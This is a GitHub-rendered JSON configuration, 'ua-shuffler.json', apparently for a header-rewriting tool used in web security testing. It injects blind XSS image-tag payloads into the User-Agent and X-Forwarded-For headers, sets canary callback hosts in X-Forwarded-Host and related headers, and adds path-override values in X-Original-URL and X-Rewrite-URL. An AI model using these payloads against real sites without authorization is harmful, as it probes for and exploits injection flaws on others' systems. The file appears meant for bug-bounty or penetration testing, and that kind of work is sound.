-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathua-shuffler.json
52 lines (52 loc) · 1.97 KB
/
ua-shuffler.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
{
"fields": {
"headers": {
"accept-language": {
"Enabled": true,
"Values": ["el", "es", "it", "de", "jp", "cn"]
},
"user-agent": {
"Enabled": false,
"Values": ["\"><img/src=\"https://{BASE64URL}.ua.yourcanary.com\">", "Samsung Galaxy S4=Mozilla/5.0 (Linux; Android 4.2.2; GT-I9505 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.59 Mobile Safari/537.36", "Phone 6=Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1", "IE6=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)", "Googlebot 2.1=Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Baidu Spider(PC)=Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" ]
},
"x-forwarded-for": {
"Enabled": true,
"Values": ["\"><img/src=\"https://{BASE64URL}.xffu.yourcanary.com\">"]
},
"x-forwarded-host": {
"Enabled": true,
"Values": ["{BASE64URL}.xfhu.yourcanary.com"]
},
"x-forwarded-server": {
"Enabled": true,
"Values": ["{BASE64URL}.xfsu.yourcanary.com"]
},
"x-host": {
"Enabled": true,
"Values": ["{BASE64URL}.xhu.yourcanary.com"]
},
"x-http-host-override": {
"Enabled": true,
"Values": ["{BASE64URL}.xhhou.yourcanary.com"]
},
"x-original-url": {
"Enabled": true,
"Values": ["/lol-x-original-url"]
},
"x-rewrite-url": {
"Enabled": true,
"Values": ["/lol-x-rewrite-url"]
}
},
"query": {
"cb": {
"Enabled": true,
"Values": ["{{UNIXTIME}}"]
},
"callback": {
"Enabled": false,
"Values": ["prompt" ]
}
}
}
}